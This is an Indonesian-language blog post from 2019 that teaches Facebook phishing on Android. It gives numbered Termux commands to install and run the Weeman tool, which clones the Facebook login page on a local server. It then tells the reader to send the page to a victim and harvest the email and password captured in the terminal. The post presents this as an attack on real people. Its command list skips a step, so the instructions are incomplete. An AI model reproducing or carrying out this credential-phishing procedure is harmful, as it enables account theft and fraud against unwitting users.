Jumat, 07 Juni 2019

CARA PHISING FB DENGAN WEEMAN DI ANDROID 100%WORK

CARA PHISING FB DENGAN WEEMAN DI ANDROID 100%WORK


Bertemu lagi dengan tutorhacking1337.blogspot.com kali ini saya akan memberikan tutor phising fb di android bahannya cukup mudah yaitu anda hanya butuh termux untuk menjalankan scriptnya sebelum masuk ke tutorial saya ada info yaitu
Jadi sekarang keamanan sosmed lebih tinggi dari pada yg dulu maka sangat sulit untuk melakukan hacking kecuali dengan phising dan bruter force 
Ok langsung aja ke tutornya 
Pertama seperti biasa install tollsnya 
1. apt update && apt upgrade -y
2. apt install git -y
3. apt install python2 -y
5. cd weeman
6. chmod 777 weeman.py
7. python2 weeman.py
8. set url http://facebook.com
9. set action_url http://facebook.com
10. run
Lalu salin urlnya 127.0.0.1:8080 ke browser maka akan muncul web phisingnya seperti di bawah ini 
Jika sudah tinggal share ke korban supaya dia login ke web itu 
Jika korban sudah login maka di termux akan muncul seperti ini

Tinggal cari email dan passwornya maka anda berhasil 

Artikel lainya


Dosa ditanggung sendiri 
Sekian tutorial dari saya apabila ada salah penulisan mohon maaf dari saya kalo ada yg ingin dipertanyakan bisa tanya di komentar 
Bila ada pertanyaan bisa hubungi saya di bawah ini
Klik untuk  pergi ke nomorku

Wassalamualaikum wr. Wb

Tidak ada komentar:

Posting Komentar